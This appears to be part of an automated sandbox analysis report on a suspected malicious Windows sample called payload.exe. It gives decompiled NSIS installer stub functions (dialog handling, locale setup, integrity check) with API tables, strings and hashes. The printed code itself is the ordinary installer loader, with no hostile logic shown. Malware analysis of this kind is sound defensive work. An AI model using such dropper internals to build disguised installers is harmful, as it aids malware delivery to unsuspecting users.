							E00405D1B(0x41fd08, _t125, _t130,  &(0x41fd08[lstrlenA(0x41fd08)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x41fd08); // executed
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x422ed8); // executed
									 *0x41f4e0 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423700,  *_t130 +  *0x422ee0 & 0x0000ffff, _t125,  *( *(_t130 + 4) * 4 + "\'@@"), _t130); // executed
									__eflags = _t73 - _t133;
									 *0x422ed8 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403EDE(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x422ed8, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x422ecc - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x422ed8, 8);
									E00403F2A(0x405);
									goto L58;
								}
								__eflags =  *0x42378c - _t133;
								if( *0x42378c != _t133) {
									goto L61;
								}
								__eflags =  *0x423780 - _t133;
								if( *0x423780 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x422ed8);
						 *0x423708 = _t133;
						EndDialog(_t125,  *0x41f0d8);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x422ed8, 0x40f, 0, 1);
						__eflags =  *0x422ecc - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x41fce8, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x41fce8,  ~(_a12 - 1) & _t115); // executed
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F45(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x422ed8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42378c - _t133;
										if( *0x42378c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f0d8 = 1;
											L21:
											_push(0x78);
											L22:
											E00403EB7();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f0d8 = _t127;
										goto L21;
									}
									__eflags =  *0x4091dc - _t133; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x422ed8);
						 *0x422ed8 = _a12;
						L58:
						if( *0x420d08 == _t133) {
							_t142 =  *0x422ed8 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x420d08 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403a14
0x00403a1d
0x00403b5e
0x00403b62
0x00403b66
0x00403b68
0x00403b6d
0x00403b78
0x00403b83
0x00403b88
0x00403b8a
0x00403b8c
0x00403b8f
0x00403b94
0x00403ba2
0x00403baf
0x00403bb6
0x00403bb6
0x00403bb7
0x00403bb7
0x00403bbc
0x00403bc2
0x00403bc9
0x00403bcf
0x00403bd1
0x00403c11
0x00403c16
0x00403c1b
0x00403c1b
0x00403c20
0x00403c29
0x00403c2b
0x00403c30
0x00403c36
0x00403c3a
0x00403c3a
0x00403c3f
0x00403c45
0x00000000
0x00000000
0x00403c50
0x00403c56
0x00000000
0x00000000
0x00403c5f
0x00403c67
0x00403c6c
0x00403c6f
0x00403c75
0x00403c7a
0x00403c7d
0x00403c83
0x00403c88
0x00403c8b
0x00403c91
0x00403c99
0x00403c9f
0x00403ca5
0x00403ca9
0x00403cb0
0x00403cb0
0x00403cb0
0x00403cba
0x00403ccc
0x00403cd8
0x00403cdd
0x00403ce7
0x00403ced
0x00403cef
0x00403cf4
0x00403cf1
0x00403cf1
0x00403cf1
0x00403d04
0x00403d1c
0x00403d1e
0x00403d24
0x00403d39
0x00403d26
0x00403d2f
0x00403d31
0x00403d31
0x00403d3f
0x00403d4f
0x00403d60
0x00403d67
0x00403d6d
0x00403d71
0x00403d76
0x00403d78
0x00000000
0x00403d7e
0x00403d7e
0x00403d80
0x00000000
0x00000000
0x00403d86
0x00403d8a
0x00403daf
0x00403db5
0x00403dbb
0x00403dbd
0x00000000
0x00000000
0x00403de3
0x00403de9
0x00403deb
0x00403df0
0x00000000
0x00000000
0x00403df6
0x00403df9
0x00403dfc
0x00403e13
0x00403e1f
0x00403e38
0x00403e3e
0x00403e42
0x00403e47
0x00403e4d
0x00000000
0x00000000
0x00403e57
0x00403e62
0x00000000
0x00403e62
0x00403d8c
0x00403d92
0x00000000
0x00000000
0x00403d98
0x00403d9e
0x00000000
0x00000000
0x00000000
0x00403da4
0x00403d78
0x00403e6f
0x00403e7b
0x00403e82
0x00000000
0x00403bd3
0x00403bd3
0x00403bd6
0x00403c09
0x00403c09
0x00403c0b
0x00000000
0x00000000
0x00000000
0x00403c0b
0x00403bd8
0x00403bdc
0x00403be1
0x00403be3
0x00000000
0x00000000
0x00403bf3
0x00403bfb
0x00000000
0x00403c01
0x00403a2f
0x00403a2f
0x00403a33
0x00403a38
0x00403a47
0x00403a47
0x00403a50
0x00403a59
0x00403a64
0x00403a64
0x00403a70
0x00403a8c
0x00403a8f
0x00403aa2
0x00403aa8
0x00403b4b
0x00000000
0x00403b54
0x00403aae
0x00403abb
0x00403abd
0x00403abf
0x00403ade
0x00403ade
0x00403ae1
0x00403ae6
0x00403ae9
0x00403af9
0x00403afa
0x00403afc
0x00403b32
0x00403b45
0x00000000
0x00403b45
0x00403afe
0x00403b04
0x00403b1d
0x00403b22
0x00403b24
0x00000000
0x00000000
0x00403b26
0x00403b12
0x00403b12
0x00403b14
0x00403b14
0x00000000
0x00403b14
0x00403b07
0x00403b0c
0x00000000
0x00403b0c
0x00403aeb
0x00403af1
0x00000000
0x00000000
0x00403af3
0x00000000
0x00403af3
0x00403ae3
0x00000000
0x00403ae3
0x00403ac9
0x00403ad0
0x00403ad6
0x00403ad8
0x00000000
0x00000000
0x00000000
0x00403ad8
0x00403a94
0x00000000
0x00403a72
0x00403a78
0x00403a82
0x00403e88
0x00403e8e
0x00403e90
0x00403e96
0x00403e9b
0x00403ea1
0x00403ea1
0x00403e96
0x00403eab
0x00000000
0x00403eab
0x00403a70

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A47
ShowWindow.USER32(?), ref: 00403A64
DestroyWindow.USER32 ref: 00403A78
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A94
GetDlgItem.USER32(?,?), ref: 00403AB5
SendMessageA.USER32 ref: 00403AC9
IsWindowEnabled.USER32(00000000), ref: 00403AD0
GetDlgItem.USER32(?,00000001), ref: 00403B7E
GetDlgItem.USER32(?,00000002), ref: 00403B88
SetClassLongA.USER32(?,000000F2,?), ref: 00403BA2
SendMessageA.USER32 ref: 00403BF3
GetDlgItem.USER32(?,00000003), ref: 00403C99
ShowWindow.USER32(00000000,?), ref: 00403CBA
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403CCC
EnableWindow.USER32(?,?), ref: 00403CE7
GetSystemMenu.USER32 ref: 00403CFD
EnableMenuItem.USER32 ref: 00403D04
SendMessageA.USER32 ref: 00403D1C
SendMessageA.USER32 ref: 00403D2F
lstrlenA.KERNEL32(0041FD08,?,0041FD08,00422F00), ref: 00403D58
SetWindowTextA.USER32(?,0041FD08), ref: 00403D67
ShowWindow.USER32(?,0000000A), ref: 00403E9B

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 3ac918ef0a42e48e667534ebe08b1c5e2c6f4e88b6f53ea8c8a8fe3e2e231469
Instruction ID: e8e4c14712e0ebd1bd3c96694815290efe84e81baa174b168cbdfcdac135d6c4
Opcode Fuzzy Hash: 3ac918ef0a42e48e667534ebe08b1c5e2c6f4e88b6f53ea8c8a8fe3e2e231469
Instruction Fuzzy Hash: 29C1DF71A04205BBDB20AF61EE45E2B3E7CFB45706B40453EF601B11E1C779A942AB6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403679 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403679(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x423710;
				_t17 = E00406092(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x41fd08;
					"1033" = 0x30;
					 *0x42a001 = 0x78;
					 *0x42a002 = 0;
					E00405BE0(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x41fd08, 0);
					__eflags =  *0x41fd08;
					if(__eflags == 0) {
						E00405BE0(0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040735A, 0x41fd08, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E00405C57("1033",  *_t17() & 0x0000ffff);
				}
				E0040393E(_t71, _t84);
				_t80 = "C:\\Users\\Albus\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical";
				 *0x423780 =  *0x423718 & 0x00000020;
				 *0x42379c = 0x10000;
				if(E00405859(_t84, "C:\\Users\\Albus\\AppData\\Local\\Temp\\Distressingly\\Bloods\\Ultraevangelical") != 0) {
					L16:
					if(E00405859(_t92, _t80) == 0) {
						E00405D1B(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x423700, 0x67, 1, 0, 0, 0x8040);
					 *0x422ee8 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E0040393E(_t71, __eflags);
							__eflags =  *0x4237a0;
							if( *0x4237a0 != 0) {
								_t28 = E00404FE4(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x422ecc; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x41fce8, 5); // executed
							_t34 = E00406024("RichEd20"); // executed
							__eflags = _t34;
							if(_t34 == 0) {
								E00406024("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x422ea0);
							__eflags = _t35;
							if(_t35 == 0) {
								GetClassInfoA(0, "RichEdit", 0x422ea0);
								 *0x422ec4 = _t81;
								RegisterClassA(0x422ea0);
							}
							_t36 =  *0x422ee0; // 0x0
							_t39 = DialogBoxParamA( *0x423700, _t36 + 0x00000069 & 0x0000ffff, 0, E00403A0B, 0); // executed
							E004035C9(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x423700;
						 *0x422ea4 = E00401000;
						 *0x422eb0 =  *0x423700;
						 *0x422eb4 = _t25;
						 *0x422ec4 = 0x4091f4;
						if(RegisterClassA(0x422ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x41fce8 = CreateWindowExA(0x80, 0x4091f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x423700, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x4226a0;
					E00405BE0( *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x423738, 0x4226a0, 0);
					_t57 =  *0x4226a0; // 0x43
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x4226a1;
						 *((char*)(E00405796(0x4226a1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00405CF9(_t80, E0040576B(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E004057B2(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x0040367f
0x00403688
0x0040368f
0x00403691
0x004036a5
0x004036b7
0x004036be
0x004036c5
0x004036cb
0x004036d0
0x004036d6
0x004036e9
0x004036e9
0x004036f4
0x00403693
0x0040369e
0x0040369e
0x004036f9
0x00403703
0x0040370c
0x00403711
0x00403722
0x004037a9
0x004037b1
0x004037ba
0x004037ba
0x004037d0
0x004037d6
0x004037e4
0x00403865
0x0040386d
0x00403877
0x0040387c
0x00403882
0x0040390c
0x00403911
0x00403913
0x0040392f
0x00000000
0x0040392f
0x00403915
0x0040391b
0x00403923
0x00403923
0x00000000
0x0040391b
0x00403890
0x0040389b
0x004038a0
0x004038a2
0x004038a9
0x004038a9
0x004038b4
0x004038bc
0x004038be
0x004038c0
0x004038c9
0x004038cc
0x004038d2
0x004038d2
0x004038d8
0x004038f1
0x00403902
0x00000000
0x00403907
0x0040386f
0x00403871
0x00000000
0x004037e6
0x004037e6
0x004037f2
0x004037fc
0x00403802
0x00403807
0x00403816
0x00403934
0x00403934
0x00000000
0x00403934
0x00403825
0x00403860
0x00000000
0x00403860
0x00403728
0x00403728
0x0040372d
0x00000000
0x00000000
0x00403737
0x00403747
0x0040374c
0x00403753
0x00000000
0x00000000
0x00403757
0x00403759
0x00403766
0x00403766
0x0040376e
0x00403774
0x0040379c
0x004037a4
0x00000000
0x00403786
0x00403787
0x00403790
0x00403796
0x00403797
0x00000000
0x00403797
0x00403792
0x00403794
0x00000000
0x00000000
0x00000000
0x00403794
0x00403774

APIs

Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403143,00000009), ref: 004060A4
Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?,?,?,00403143,00000009), ref: 004060BF

lstrcatA.KERNEL32(1033,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000,00000002,75572754,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\payload.exe",00000000), ref: 004036F4
lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical,1033,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000,00000002,75572754), ref: 00403769
lstrcmpiA.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical,1033,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000), ref: 0040377C
GetFileAttributesA.KERNEL32(Call), ref: 00403787
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical), ref: 004037D0

Part of subcall function 00405C57: wsprintfA.USER32 ref: 00405C64

RegisterClassA.USER32(00422EA0), ref: 0040380D
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403825
CreateWindowExA.USER32 ref: 0040385A
ShowWindow.USER32(00000005,00000000), ref: 00403890
GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004038BC
GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004038C9
RegisterClassA.USER32(00422EA0), ref: 004038D2
DialogBoxParamA.USER32 ref: 004038F1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040367E
_Nb, xrefs: 004037EC, 00403854
Control Panel\Desktop\ResourceLocale, xrefs: 004036AD
.exe, xrefs: 00403776
RichEdit20A, xrefs: 004038B4, 004038BA
"C:\Users\user\Desktop\payload.exe", xrefs: 0040367D
RichEd32, xrefs: 004038A4
RichEd20, xrefs: 00403896
Call, xrefs: 00403737, 0040373F, 0040374C, 00403796, 0040379C
1033, xrefs: 00403699, 004036EF
RichEdit, xrefs: 004038C3
C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical, xrefs: 00403703, 0040370B, 004037A3, 004037A9, 004037B9
.DEFAULT\Control Panel\International, xrefs: 004036DF

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\payload.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Distressingly\Bloods\Ultraevangelical$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-347383791
Opcode ID: 5c13432dcba976acc153c6c4cb0ae4a4ceee92b52a3611d71cd5da1aeea12791
Instruction ID: cdcda0c5d6d895e27caec97b3fe99e3f57ebd92391a3aca4eab7d54baf018be6
Opcode Fuzzy Hash: 5c13432dcba976acc153c6c4cb0ae4a4ceee92b52a3611d71cd5da1aeea12791
Instruction Fuzzy Hash: FA61C8B16442007ED620BF669D45F373AACEB44759F40447FF941B22E2C77CAD029A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402C66 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402C66(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\Albus\\Desktop\\payload.exe";
				 *0x42370c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\Albus\\Desktop\\payload.exe", 0x400);
				_t89 = E0040596C(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409018 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\Albus\\Desktop";
				E00405CF9("C:\\Users\\Albus\\Desktop", _t91);
				E00405CF9(0x42b000, E004057B2(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x4168c4 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402C02(1);
					__eflags =  *0x423714 - _t82;
					if( *0x423714 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E00403091( *0x423714 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E9F(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x423710 = _t94;
							 *0x423718 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42371c =  *0x42371c + 1;
								__eflags =  *0x42371c;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405927(0x423720, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403091( *0x40a8b8);
					_t65 = E0040307B( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x423714) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E0040307B(0x4168c8, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402C02(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x423714;
						if( *0x423714 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402C02(0);
							}
							goto L20;
						}
						E00405927( &_v44, 0x4168c8, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x40a8b8; // 0x45372
						 *0x4237a0 =  *0x4237a0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x423714 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x409194
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x4168c4; // 0x47258
						if(__eflags < 0) {
							_v12 = E00406107(_v12, 0x4168c8, _t90);
						}
						 *0x40a8b8 =  *0x40a8b8 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402c6e
0x00402c71
0x00402c74
0x00402c77
0x00402c7d
0x00402c8e
0x00402c93
0x00402ca6
0x00402cab
0x00402cae
0x00402cb4
0x00000000
0x00402cb6
0x00402cc1
0x00402cc7
0x00402cd8
0x00402cdf
0x00402ce5
0x00402ce7
0x00402cec
0x00402cee
0x00402ddb
0x00402ddd
0x00402de2
0x00402de9
0x00000000
0x00000000
0x00402deb
0x00402dee
0x00402e12
0x00402e17
0x00402e1d
0x00402e28
0x00402e2d
0x00402e30
0x00402e31
0x00402e32
0x00402e34
0x00402e39
0x00402e3c
0x00402e4f
0x00402e53
0x00402e5b
0x00402e60
0x00402e62
0x00402e62
0x00402e62
0x00402e6a
0x00402e6a
0x00402e6d
0x00402e6e
0x00402e6e
0x00402e71
0x00402e73
0x00402e73
0x00402e73
0x00402e7d
0x00402e83
0x00402e91
0x00402e96
0x00000000
0x00402e96
0x00000000
0x00402e3c
0x00402df6
0x00402e01
0x00402e06
0x00402e08
0x00000000
0x00000000
0x00402e0d
0x00402e10
0x00000000
0x00000000
0x00000000
0x00402cf4
0x00402cf9
0x00402cfe
0x00402d02
0x00402d09
0x00402d0e
0x00402d10
0x00402d12
0x00402d12
0x00402d16
0x00402d1b
0x00402d1d
0x00402e47
0x00402e3e
0x00000000
0x00402e3e
0x00402d23
0x00402d2a
0x00402da6
0x00402daa
0x00402dae
0x00402db3
0x00000000
0x00402daa
0x00402d33
0x00402d38
0x00402d3b
0x00402d40
0x00000000
0x00000000
0x00402d42
0x00402d49
0x00000000
0x00000000
0x00402d4b
0x00402d52
0x00000000
0x00000000
0x00402d54
0x00402d5b
0x00000000
0x00000000
0x00402d5d
0x00402d64
0x00000000
0x00000000
0x00402d66
0x00402d6c
0x00402d75
0x00402d7b
0x00402d7e
0x00402d80
0x00402d86
0x00000000
0x00000000
0x00402d8c
0x00402d90
0x00402d98
0x00402d98
0x00402d9b
0x00402d9b
0x00402d9e
0x00402da0
0x00402da2
0x00402da2
0x00000000
0x00402da0
0x00402d92
0x00402d96
0x00000000
0x00000000
0x00000000
0x00402db4
0x00402db4
0x00402dba
0x00402dc6
0x00402dc6
0x00402dc9
0x00402dcf
0x00402dd1
0x00402dd1
0x00402dd9
0x00402dd9
0x00000000
0x00402dd9

APIs

GetTickCount.KERNEL32(75572754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00402C77
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\payload.exe,00000400), ref: 00402C93

Part of subcall function 0040596C: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\payload.exe,80000000,00000003), ref: 00405970
Part of subcall function 0040596C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405992

